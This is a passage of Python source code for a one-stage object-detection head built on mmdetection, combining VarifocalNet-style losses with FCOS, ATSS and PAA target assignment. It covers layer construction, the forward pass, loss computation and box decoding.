bbox_norm_type='reg_denom',\n loss_cls_fl=dict(\n type='FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n use_vfl=True,\n loss_cls=dict(\n type='VarifocalLoss',\n use_sigmoid=True,\n alpha=0.75,\n gamma=2.0,\n iou_weighted=True,\n loss_weight=1.0),\n loss_bbox=dict(type='GIoULoss', loss_weight=1.5),\n loss_bbox_refine=dict(type='GIoULoss', loss_weight=2.0),\n norm_cfg=dict(type='GN', num_groups=32, requires_grad=True),\n assign_type=\"paa\",\n anchor_generator=dict(\n type='AnchorGenerator',\n ratios=[1.0],\n octave_base_scale=8,\n scales_per_octave=1,\n center_offset=0.0,\n strides=[8, 16, 32, 64, 128]),\n **kwargs):\n # dcn base offsets, adapted from reppoints_head.py\n self.topk=topk\n self.num_out = len(anchor_generator[\"strides\"])\n self.anchor_generator = build_anchor_generator(anchor_generator)\n self.num_anchors = self.anchor_generator.num_base_anchors[0]\n super(FCOSHead, self).__init__(\n num_classes, in_channels, norm_cfg=norm_cfg, **kwargs)\n\n self.regress_ranges = regress_ranges\n self.reg_denoms = [\n regress_range[-1] for regress_range in regress_ranges\n ]\n self.reg_denoms[-1] = self.reg_denoms[-2] * 2\n self.center_sampling = center_sampling\n self.center_sample_radius = center_sample_radius\n self.sync_num_pos = sync_num_pos\n self.bbox_norm_type = bbox_norm_type\n self.gradient_mul = gradient_mul\n self.use_vfl = use_vfl\n if self.use_vfl:\n self.loss_cls = build_loss(loss_cls)\n else:\n self.loss_cls = build_loss(loss_cls_fl)\n self.loss_bbox = build_loss(loss_bbox)\n self.loss_bbox_refine = build_loss(loss_bbox_refine)\n\n # for getting ATSS targets\n self.assign_type = assign_type\n if self.assign_type == 'paa':\n # paa_assign_cls_loss = dict(type='FocalLoss', use_sigmoid=True, gamma=2.0, alpha=0.25, loss_weight=1.0)\n paa_assign_cls_loss = loss_cls_fl\n self.paa_assign_cls_loss = build_loss(paa_assign_cls_loss)\n\n self.use_sigmoid_cls = loss_cls.get('use_sigmoid', False)\n self.anchor_center_offset = anchor_generator['center_offset']\n self.num_anchors = self.anchor_generator.num_base_anchors[0]\n self.sampling = False\n if self.train_cfg:\n self.assigner = build_assigner(self.train_cfg.assigner)\n sampler_cfg = dict(type='PseudoSampler')\n self.sampler = build_sampler(sampler_cfg, context=self)\n\n def _init_layers(self):\n \"\"\"Initialize layers of the head.\"\"\"\n self.relu = nn.ReLU(inplace=True)\n self.mlvl_cls_convs = nn.ModuleList()\n self.mlvl_reg_convs = nn.ModuleList()\n self.mlvl_vfl_cls_convs = nn.ModuleList()\n self.mlvl_vfl_reg_convs = nn.ModuleList()\n self.mlvl_vfl_reg = nn.ModuleList()\n self.mlvl_vfl_refine_convs = nn.ModuleList()\n self.mlvl_scale = nn.ModuleList()\n self.mlvl_refine_scale = nn.ModuleList()\n\n\n for level in range(self.num_out):\n cls_convs = nn.ModuleList()\n reg_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n cls_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n reg_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n\n vfl_cls_convs = nn.Conv2d(self.feat_channels, self.cls_out_channels, 1, padding=0)\n vfl_reg_convs = ConvModule(self.feat_channels, self.feat_channels, 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg,\n bias=self.conv_bias)\n\n vfl_refine_convs = nn.Conv2d(self.feat_channels, 4, 1, padding=0)\n vfl_reg = nn.Conv2d(self.feat_channels, 4, 1, padding=0)\n\n scale = Scale(1.0)\n scale_refine = Scale(1.0)\n\n self.mlvl_cls_convs.append(cls_convs)\n self.mlvl_reg_convs.append(reg_convs)\n self.mlvl_vfl_cls_convs.append(vfl_cls_convs)\n self.mlvl_vfl_reg_convs.append(vfl_reg_convs)\n self.mlvl_vfl_refine_convs.append(vfl_refine_convs)\n self.mlvl_vfl_reg.append(vfl_reg)\n\n self.mlvl_scale.append(scale)\n self.mlvl_refine_scale.append(scale_refine)\n\n def init_weights(self):\n \"\"\"Initialize weights of the head.\"\"\"\n for level in range(self.num_out):\n for m in self.mlvl_cls_convs[level]:\n if isinstance(m.conv, nn.Conv2d):\n normal_init(m.conv, std=0.01)\n for m in self.mlvl_reg_convs[level]:\n if isinstance(m.conv, nn.Conv2d):\n normal_init(m.conv, std=0.01)\n normal_init(self.mlvl_vfl_reg[level], std=0.01)\n # normal_init(self.mlvl_vfl_cls_convs[level], std=0.01)\n normal_init(self.mlvl_vfl_reg_convs[level].conv, std=0.01)\n normal_init(self.mlvl_vfl_refine_convs[level], std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.mlvl_vfl_cls_convs[level], std=0.01, bias=bias_cls)\n\n def forward(self, feats, onnx=False):\n \"\"\"Forward features from the upstream network.\n Args:\n feats (tuple[Tensor]): Features from the upstream network, each is\n a 4D-tensor.\n Returns:\n tuple:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level, each is a 4D-tensor, the channel number is\n num_points * num_classes.\n bbox_preds (list[Tensor]): Box offsets for each\n scale level, each is a 4D-tensor, the channel number is\n num_points * 4.\n bbox_preds_refine (list[Tensor]): Refined Box offsets for\n each scale level, each is a 4D-tensor, the channel\n number is num_points * 4.\n \"\"\"\n return multi_apply(self.forward_single, feats, self.mlvl_scale,\n self.mlvl_refine_scale, self.strides, self.reg_denoms,\n [level for level in range(self.num_out)],\n [onnx for _ in range(len(feats))])\n\n def forward_single(self, x, scale, scale_refine, stride, reg_denom, level, onnx=False):\n \"\"\"Forward features of a single scale level.\n Args:\n x (Tensor): FPN feature maps of the specified stride.\n scale (:obj: `mmcv.cnn.Scale`): Learnable scale module to resize\n the bbox prediction.\n scale_refine (:obj: `mmcv.cnn.Scale`): Learnable scale module to\n resize the refined bbox prediction.\n stride (int): The corresponding stride for feature maps,\n used to normalize the bbox prediction when\n bbox_norm_type = 'stride'.\n reg_denom (int): The corresponding regression range for feature\n maps, only used to normalize the bbox prediction when\n bbox_norm_type = 'reg_denom'.\n Returns:\n tuple: iou-aware cls scores for each box, bbox predictions and\n refined bbox predictions of input feature maps.\n \"\"\"\n cls_feat = x\n reg_feat = x\n\n for cls_layer in self.mlvl_cls_convs[level]:\n cls_feat = cls_layer(cls_feat)\n\n for reg_layer in self.mlvl_reg_convs[level]:\n reg_feat = reg_layer(reg_feat)\n\n # predict the bbox_pred of different level\n reg_feat_init = self.mlvl_vfl_reg_convs[level](reg_feat)\n if onnx:\n bbox_pred = self.mlvl_vfl_reg[level](reg_feat_init)\n scale = reg_denom*scale.scale\n\n bbox_pred = scale*bbox_pred\n bbox_pred_refine = scale_refine(self.mlvl_vfl_refine_convs[level](reg_feat))\n bbox_pred_refine = bbox_pred_refine * bbox_pred.detach()\n\n cls_score = F.sigmoid(self.mlvl_vfl_cls_convs[level](cls_feat))\n return cls_score, bbox_pred_refine\n elif self.bbox_norm_type == 'reg_denom':\n bbox_pred = scale(\n # self.mlvl_vfl_reg[level](reg_feat_init)).exp() * reg_denom\n self.mlvl_vfl_reg[level](reg_feat_init)) * reg_denom\n elif self.bbox_norm_type == 'stride':\n bbox_pred = scale(\n self.mlvl_vfl_reg[level](reg_feat_init)) * stride\n # self.mlvl_vfl_reg[level](reg_feat_init)).exp() * stride\n else:\n raise NotImplementedError\n\n # compute star deformable convolution offsets\n # converting dcn_offset to reg_feat.dtype thus VFNet can be\n # trained with FP16\n\n # refine the bbox_pred\n\n bbox_pred_refine = scale_refine(\n self.mlvl_vfl_refine_convs[level](reg_feat))\n # self.mlvl_vfl_refine_convs[level](reg_feat)).float().exp()\n bbox_pred_refine = bbox_pred_refine * bbox_pred.detach()\n\n # predict the iou-aware cls score\n cls_score = self.mlvl_vfl_cls_convs[level](cls_feat)\n\n return cls_score, bbox_pred, bbox_pred_refine\n # import pysnooper\n # @pysnooper.snoop(depth=2)\n @force_fp32(apply_to=('cls_scores', 'bbox_preds', 'bbox_preds_refine'))\n def loss(self,\n cls_scores,\n bbox_preds,\n bbox_preds_refine,\n gt_bboxes,\n gt_labels,\n img_metas,\n gt_bboxes_ignore=None):\n \"\"\"Compute loss of the head.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level, each is a 4D-tensor, the channel number is\n num_points * num_classes.\n bbox_preds (list[Tensor]): Box offsets for each\n scale level, each is a 4D-tensor, the channel number is\n num_points * 4.\n bbox_preds_refine (list[Tensor]): Refined Box offsets for\n each scale level, each is a 4D-tensor, the channel\n number is num_points * 4.\n gt_bboxes (list[Tensor]): Ground truth bboxes for each image with\n shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format.\n gt_labels (list[Tensor]): class indices corresponding to each box\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | list[Tensor]): specify which bounding\n boxes can be ignored when computing the loss.\n Default: None.\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n assert len(cls_scores) == len(bbox_preds) == len(bbox_preds_refine)\n device = cls_scores[0].device\n num_imgs = len(img_metas)\n\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n all_level_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,\n bbox_preds[0].device)\n\n anchor_list, valid_flag_list = PAA_ATSSHead.get_anchors(self,\n featmap_sizes, img_metas, device=device)\n\n if self.assign_type == 'paa':\n labels, label_weights, \\\n bbox_targets, bbox_weights, \\\n pos_inds_image, pos_gt_index_image = self.get_targets(\n cls_scores, all_level_points, gt_bboxes, gt_labels, img_metas,\n gt_bboxes_ignore)\n else:\n labels, label_weights, bbox_targets, bbox_weights = self.get_targets(\n cls_scores, all_level_points, gt_bboxes, gt_labels, img_metas,\n gt_bboxes_ignore)\n\n cls_scores = levels_to_images(cls_scores)\n cls_scores = [item.reshape(-1, self.cls_out_channels) for item in cls_scores]\n\n bbox_preds = levels_to_images(bbox_preds)\n bbox_preds = [item.reshape(-1, 4) for item in bbox_preds]\n\n bbox_preds_refine = levels_to_images(bbox_preds_refine)\n bbox_preds_refine = [item.reshape(-1, 4) for item in bbox_preds_refine]\n\n if self.assign_type == 'paa':\n all_level_points_cat = [torch.cat(all_level_points) for _ in range(num_imgs)]\n # # print(\"paa get_pos_loss start\")\n pos_losses_list, = multi_apply(self.get_pos_loss,\n cls_scores, bbox_preds, bbox_preds_refine,\n labels, label_weights,\n bbox_targets, bbox_weights,\n all_level_points_cat,\n pos_inds_image)\n # print(\"paa get_pos_loss end\")\n with torch.no_grad():\n # print(\"paa_reassign start\")\n labels, label_weights, bbox_weights, num_pos = multi_apply(\n self.paa_reassign,\n pos_losses_list,\n labels,\n label_weights,\n bbox_weights,\n pos_inds_image,\n pos_gt_index_image,\n anchor_list,\n )\n # print(\"paa_reassign end\")\n\n bg_class_ind = self.num_classes\n # flatten cls_scores, bbox_preds and bbox_preds_refine\n if self.assign_type == 'paa':\n # print(\"assign_type start\")\n #num_batch is first dim\n flatten_cls_scores = torch.cat(cls_scores, 0).view(-1, cls_scores[0].size(-1))\n flatten_bbox_preds = torch.cat(bbox_preds, 0).view(-1, bbox_preds[0].size(-1))\n flatten_bbox_preds_refine = torch.cat(bbox_preds_refine, 0).view(-1, bbox_preds_refine[0].size(-1))\n\n flatten_points = torch.cat(all_level_points_cat)\n flatten_labels = torch.cat(labels, 0).view(-1)\n flatten_bbox_targets = torch.cat(bbox_targets,\n 0).view(-1, bbox_targets[0].size(-1))\n\n pos_inds = ((flatten_labels >= 0) & (flatten_labels < self.num_classes)).nonzero().reshape(-1)\n # print(\"assign_type end\")\n else:\n # num_level is first dim\n flatten_cls_scores = [\n cls_score.permute(0, 2, 3,\n 1).reshape(-1,\n self.cls_out_channels).contiguous()\n for cls_score in cls_scores\n ]\n flatten_bbox_preds = [\n bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4).contiguous()\n for bbox_pred in bbox_preds\n ]\n flatten_bbox_preds_refine = [\n bbox_pred_refine.permute(0, 2, 3, 1).reshape(-1, 4).contiguous()\n for bbox_pred_refine in bbox_preds_refine\n ]\n flatten_cls_scores = torch.cat(flatten_cls_scores)\n flatten_bbox_preds = torch.cat(flatten_bbox_preds)\n flatten_bbox_preds_refine = torch.cat(flatten_bbox_preds_refine)\n\n flatten_labels = torch.cat(labels)\n flatten_bbox_targets = torch.cat(bbox_targets)\n\n flatten_points = torch.cat([points.repeat(num_imgs, 1) for points in all_level_points])\n\n pos_inds = torch.where(\n ((flatten_labels >= 0) & (flatten_labels < bg_class_ind)) > 0)[0]\n\n num_pos = len(pos_inds)\n\n # FG cat_id: [0, num_classes - 1], BG cat_id: num_classes\n\n\n pos_bbox_preds = flatten_bbox_preds[pos_inds]\n pos_bbox_preds_refine = flatten_bbox_preds_refine[pos_inds]\n pos_labels = flatten_labels[pos_inds]\n\n # sync num_pos across all gpus\n if self.sync_num_pos:\n num_pos_avg_per_gpu = reduce_mean(\n pos_inds.new_tensor(num_pos).float()).item()\n num_pos_avg_per_gpu = max(num_pos_avg_per_gpu, 1.0)\n else:\n num_pos_avg_per_gpu = num_pos\n\n\n\n if num_pos > 0:\n pos_bbox_targets = flatten_bbox_targets[pos_inds]\n pos_points = flatten_points[pos_inds]\n\n pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)\n pos_decoded_target_preds = distance2bbox(pos_points,\n pos_bbox_targets)\n iou_targets_ini = bbox_overlaps(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_ini = iou_targets_ini.clone().detach()\n iou_targets_ini_avg_per_gpu = reduce_mean(\n bbox_weights_ini.sum()).item()\n\n bbox_avg_factor_ini = max(iou_targets_ini_avg_per_gpu, 1.0)\n # print(\"loss_bbox start\")\n loss_bbox = self.loss_bbox(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_ini,\n avg_factor=bbox_avg_factor_ini)\n # print(\"loss_bbox end\")\n pos_decoded_bbox_preds_refine = \\\n distance2bbox(pos_points, pos_bbox_preds_refine)\n iou_targets_rf = bbox_overlaps(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_rf = iou_targets_rf.clone().detach()\n iou_targets_rf_avg_per_gpu = reduce_mean(\n bbox_weights_rf.sum()).item()\n bbox_avg_factor_rf = max(iou_targets_rf_avg_per_gpu, 1.0)\n # print(\"loss_bbox_refine start\")\n loss_bbox_refine = self.loss_bbox_refine(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_rf,\n avg_factor=bbox_avg_factor_rf)\n # print(\"loss_bbox_refine end\")\n # build IoU-aware cls_score targets\n if self.use_vfl:\n pos_ious = iou_targets_rf.clone().detach()\n cls_iou_targets = torch.zeros_like(flatten_cls_scores)\n cls_iou_targets[pos_inds, pos_labels] = pos_ious\n else:\n loss_bbox = pos_bbox_preds.sum() * 0\n loss_bbox_refine = pos_bbox_preds_refine.sum() * 0\n if self.use_vfl:\n cls_iou_targets = torch.zeros_like(flatten_cls_scores)\n\n if self.use_vfl:\n loss_cls = self.loss_cls(\n flatten_cls_scores,\n cls_iou_targets,\n avg_factor=num_pos_avg_per_gpu)\n else:\n try:\n label_weights = torch.cat(label_weights)\n except:\n pass\n # print(\"cls loss start\")\n loss_cls = self.loss_cls(\n flatten_cls_scores,\n flatten_labels,\n weight=label_weights,\n avg_factor=num_pos_avg_per_gpu)\n # print(\"cls loss end\")\n\n label_weights = torch.cat(label_weights)\n loss_focal = self.paa_assign_cls_loss(\n flatten_cls_scores,\n flatten_labels,\n weight=label_weights,\n avg_factor=num_pos_avg_per_gpu)\n\n\n return dict(\n loss_cls=loss_cls,\n loss_bbox=loss_bbox,\n loss_bbox_rf=loss_bbox_refine,\n loss_focal=loss_focal)\n\n @force_fp32(apply_to=('cls_scores', 'bbox_preds', 'bbox_preds_refine'))\n def get_bboxes(self,\n cls_scores,\n bbox_preds,\n bbox_preds_refine,\n img_metas,\n cfg=None,\n rescale=None,\n with_nms=True):\n \"\"\"Transform network outputs for a batch into bbox predictions.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n bbox_preds (list[Tensor]): Box offsets for each scale\n level with shape (N, num_points * 4, H, W).\n bbox_preds_refine (list[Tensor]): Refined Box offsets for\n each scale level with shape (N, num_points * 4, H, W).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n cfg (mmcv.Config): Test / postprocessing configuration,\n if None, test_cfg would be used. Default: None.\n rescale (bool): If True, return boxes in original image space.\n Default: False.\n with_nms (bool): If True, do nms before returning boxes.\n Default: True.\n Returns:\n list[tuple[Tensor, Tensor]]: Each item in result_list is 2-tuple.\n The first item is an (n, 5) tensor, where the first 4 columns\n are bounding box positions (tl_x, tl_y, br_x, br_y) and the\n 5-th column is a score between 0 and 1. The second item is a\n (n,) tensor where each item is the predicted class label of\n the corresponding box.\n \"\"\"\n assert len(cls_scores) == len(bbox_preds) == len(bbox_preds_refine)\n num_levels = len(cls_scores)\n\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n mlvl_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,\n bbox_preds[0].device)\n result_list = []\n for img_id in range(len(img_metas)):\n cls_score_list = [\n cls_scores[i][img_id].detach() for i in range(num_levels)\n ]\n bbox_pred_list = [\n bbox_preds_refine[i][img_id].detach()\n for i in range(num_levels)\n ]\n img_shape = img_metas[img_id]['img_shape']\n scale_factor = img_metas[img_id]['scale_factor']\n det_bboxes = self._get_bboxes_single(cls_score_list,\n bbox_pred_list, mlvl_points,\n img_shape, scale_factor, cfg,\n rescale, with_nms)\n result_list.append(det_bboxes)\n return result_list\n\n def _get_bboxes_single(self,\n cls_scores,\n bbox_preds,\n mlvl_points,\n img_shape,\n scale_factor,\n cfg,\n rescale=False,\n with_nms=True):\n \"\"\"Transform outputs for a single batch item into bbox predictions.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for a single scale\n level with shape (num_points * num_classes, H, W).\n bbox_preds (list[Tensor]): Box offsets for a single scale\n level with shape (num_points * 4, H, W).\n mlvl_points (list[Tensor]): Box reference for a single scale level\n with shape (num_total_points, 4).\n img_shape (tuple[int]): Shape of the input image,\n (height, width, 3).\n scale_factor (ndarray): Scale factor of the image arrange as\n (w_scale, h_scale, w_scale, h_scale).\n cfg (mmcv.Config | None): Test / postprocessing configuration,\n if None, test_cfg would be used.\n rescale (bool): If True, return boxes in original image space.\n Default: False.\n with_nms (bool): If True, do nms before returning boxes.\n Default: True.\n Returns:\n tuple(Tensor):\n det_bboxes (Tensor): BBox predictions in shape (n, 5), where\n the first 4 columns are bounding box positions\n (tl_x, tl_y, br_x, br_y) and the 5-th column is a score\n between 0 and 1.\n det_labels (Tensor): A (n,) tensor where each item is the\n predicted class label of the corresponding box.\n \"\"\"\n cfg = self.test_cfg if cfg is None else cfg\n assert len(cls_scores) == len(bbox_preds) == len(mlvl_points)\n mlvl_bboxes = []\n mlvl_scores = []\n for cls_score, bbox_pred, points in zip(cls_scores, bbox_preds,\n mlvl_points):\n assert cls_score.size()[-2:] == bbox_pred.size()[-2:]\n scores = cls_score.permute(1, 2, 0).reshape(\n -1, self.cls_out_channels).contiguous().sigmoid()\n bbox_pred = bbox_pred.permute(1, 2, 0).reshape(-1, 4).contiguous()\n\n nms_pre = cfg.get('nms_pre', -1)\n if 0 < nms_pre < scores.shape[0]:\n max_scores, _ = scores.max(dim=1)\n _, topk_inds = max_scores.topk(nms_pre)\n points = points[topk_inds, :]\n bbox_pred = bbox_pred[topk_inds, :]\n scores = scores[topk_inds, :]\n bboxes = distance2bbox(points, bbox_pred, max_shape=img_shape)\n mlvl_bboxes.append(bboxes)\n mlvl_scores.append(scores)\n mlvl_bboxes = torch.cat(mlvl_bboxes)\n if rescale:\n mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)\n mlvl_scores = torch.cat(mlvl_scores)\n padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)\n # remind that we set FG labels to [0, num_class-1] since mmdet v2.0\n # BG cat_id: num_class\n mlvl_scores = torch.cat([mlvl_scores, padding], dim=1)\n if with_nms:\n det_bboxes, det_labels = multiclass_nms(mlvl_bboxes, mlvl_scores,\n cfg.score_thr, cfg.nms,\n cfg.max_per_img)\n return det_bboxes, det_labels\n else:\n return mlvl_bboxes, mlvl_scores\n\n def _get_points_single(self,\n featmap_size,\n stride,\n dtype,\n device,\n flatten=False):\n \"\"\"Get points according to feature map sizes.\"\"\"\n h, w = featmap_size\n x_range = torch.arange(\n 0, w * stride, stride, dtype=dtype, device=device)\n y_range = torch.arange(\n 0, h * stride, stride, dtype=dtype, device=device)\n y, x = torch.meshgrid(y_range, x_range)\n # to be compatible with anchor points in ATSS\n if self.assign_type == 'atss' or self.assign_type == 'paa':\n points = torch.stack(\n (x.reshape(-1), y.reshape(-1)), dim=-1) + \\\n stride * self.anchor_center_offset\n else:\n points = torch.stack(\n (x.reshape(-1), y.reshape(-1)), dim=-1) + stride // 2\n return points\n\n def get_targets(self, cls_scores, mlvl_points, gt_bboxes, gt_labels,\n img_metas, gt_bboxes_ignore):\n \"\"\"A wrapper for computing ATSS and FCOS targets for points in multiple\n images.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n gt_bboxes (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | Tensor): Ground truth bboxes to be\n ignored, shape (num_ignored_gts, 4).\n Returns:\n tuple:\n labels_list (list[Tensor]): Labels of each level.\n label_weights (Tensor/None): Label weights of all levels.\n bbox_targets_list (list[Tensor]): Regression targets of each\n level, (l, t, r, b).\n bbox_weights (Tensor/None): Bbox weights of all levels.\n \"\"\"\n if self.assign_type == \"atss\":\n return self.get_atss_targets(cls_scores, mlvl_points, gt_bboxes,\n gt_labels, img_metas,\n gt_bboxes_ignore)\n elif self.assign_type == \"paa\":\n return self.get_paa_targets(cls_scores, mlvl_points, gt_bboxes,\n gt_labels, img_metas,\n gt_bboxes_ignore)\n else:\n self.norm_on_bbox = False\n return self.get_fcos_targets(mlvl_points, gt_bboxes, gt_labels)\n\n def _get_target_single(self, *args, **kwargs):\n \"\"\"Avoid ambiguity in multiple inheritance.\"\"\"\n if self.assign_type == \"atss\":\n return ATSSHead._get_target_single(self, *args, **kwargs)\n if self.assign_type == \"paa\":\n return PAA_ATSSHead._get_target_single(self, *args, **kwargs)\n else:\n return FCOSHead._get_target_single(self, *args, **kwargs)\n\n def get_fcos_targets(self, points, gt_bboxes_list, gt_labels_list):\n \"\"\"Compute FCOS regression and classification targets for points in\n multiple images.\n Args:\n points (list[Tensor]): Points of each fpn level, each has shape\n (num_points, 2).\n gt_bboxes_list (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels_list (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n Returns:\n tuple:\n labels (list[Tensor]): Labels of each level.\n label_weights: None, to be compatible with ATSS targets.\n bbox_targets (list[Tensor]): BBox targets of each level.\n bbox_weights: None, to be compatible with ATSS targets.\n \"\"\"\n labels, bbox_targets = FCOSHead.get_targets(self, points,\n gt_bboxes_list,\n gt_labels_list)\n label_weights = None\n bbox_weights = None\n return labels, label_weights, bbox_targets, bbox_weights\n\n def get_atss_targets(self,\n cls_scores,\n mlvl_points,\n gt_bboxes,\n gt_labels,\n img_metas,\n gt_bboxes_ignore=None):\n \"\"\"A wrapper for computing ATSS targets for points in multiple images.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n gt_bboxes (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | Tensor): Ground truth bboxes to be\n ignored, shape (num_ignored_gts, 4). Default: None.\n Returns:\n tuple:\n labels_list (list[Tensor]): Labels of each level.\n label_weights (Tensor): Label weights of all levels.\n bbox_targets_list (list[Tensor]): Regression targets of each\n level, (l, t, r, b).\n bbox_weights (Tensor): Bbox weights of all levels.\n \"\"\"\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n assert len(featmap_sizes) == self.anchor_generator.num_levels\n\n device = cls_scores[0].device\n anchor_list, valid_flag_list = self.get_anchors(\n featmap_sizes, img_metas, device=device)\n label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1\n\n cls_reg_targets = ATSSHead.get_targets(\n self,\n anchor_list,\n valid_flag_list,\n gt_bboxes,\n img_metas,\n gt_bboxes_ignore_list=gt_bboxes_ignore,\n gt_labels_list=gt_labels,\n label_channels=label_channels,\n unmap_outputs=True)\n if cls_reg_targets is None:\n return None\n\n (anchor_list, labels_list, label_weights_list, bbox_targets_list,\n bbox_weights_list, num_total_pos, num_total_neg) = cls_reg_targets\n\n bbox_targets_list = [\n bbox_targets.reshape(-1, 4) for bbox_targets in bbox_targets_list\n ]\n\n num_imgs = len(img_metas)\n # transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format\n bbox_targets_list = self.transform_bbox_targets(\n bbox_targets_list, mlvl_points, num_imgs)\n\n labels_list = [labels.reshape(-1) for labels in labels_list]\n label_weights_list = [\n label_weights.reshape(-1) for label_weights in label_weights_list\n ]\n bbox_weights_list = [\n bbox_weights.reshape(-1) for bbox_weights in bbox_weights_list\n ]\n label_weights = torch.cat(label_weights_list)\n bbox_weights = torch.cat(bbox_weights_list)\n return labels_list, label_weights, bbox_targets_list, bbox_weights\n\n def get_paa_targets(self,\n cls_scores,\n mlvl_points,\n gt_bboxes,\n gt_labels,\n img_metas,\n gt_bboxes_ignore=None):\n \"\"\"A wrapper for computing ATSS targets for points in multiple images.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n gt_bboxes (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | Tensor): Ground truth bboxes to be\n ignored, shape (num_ignored_gts, 4). Default: None.\n Returns:\n tuple:\n labels_list (list[Tensor]): Labels of each level.\n label_weights (Tensor): Label weights of all levels.\n bbox_targets_list (list[Tensor]): Regression targets of each\n level, (l, t, r, b).\n bbox_weights (Tensor): Bbox weights of all levels.\n \"\"\"\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n assert len(featmap_sizes) == self.anchor_generator.num_levels\n\n device = cls_scores[0].device\n anchor_list, valid_flag_list = self.get_anchors(\n featmap_sizes, img_metas, device=device)\n label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1\n\n cls_reg_targets = PAA_ATSSHead.get_targets(\n self,\n anchor_list,\n valid_flag_list,\n gt_bboxes,\n img_metas,\n gt_bboxes_ignore_list=gt_bboxes_ignore,\n gt_labels_list=gt_labels,\n label_channels=label_channels,\n unmap_outputs=True)\n if cls_reg_targets is None:\n return None\n\n (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list,\n pos_inds, pos_gt_index) = cls_reg_targets\n\n bbox_targets_list = [\n bbox_targets.reshape(-1, 4) for bbox_targets in bbox_targets_list\n ]\n\n num_imgs = len(img_metas)\n # transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format\n mlvl_points = torch.cat(mlvl_points)\n bbox_targets_list = self.transform_paa_bbox_targets(bbox_targets_list, mlvl_points)\n\n labels_list = [labels.reshape(-1) for labels in labels_list]\n label_weights_list = [\n label_weights.reshape(-1) for label_weights in label_weights_list\n ]\n bbox_weights_list = [\n bbox_weights.reshape(-1) for bbox_weights in bbox_weights_list\n ]\n # label_weights = torch.cat(label_weights_list)\n # bbox_weights = torch.cat(bbox_weights_list)\n return labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, pos_inds, pos_gt_index\n\n def transform_paa_bbox_targets(self, decoded_bboxes, mlvl_points):\n \"\"\"Transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format.\n Args:\n decoded_bboxes (list[Tensor]): Regression targets of each level,\n in the form of (x1, y1, x2, y2).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n num_imgs (int): the number of images in a batch.\n Returns:\n bbox_targets (list[Tensor]): Regression targets of each level in\n the form of (l, t, r, b).\n \"\"\"\n # TODO: Re-implemented in Class PointCoder\n num_images = len(decoded_bboxes)\n bbox_targets = []\n assert len(decoded_bboxes[0]) == len(mlvl_points)\n\n for i in range(num_images):\n bbox_target = bbox2distance(mlvl_points, decoded_bboxes[i])\n 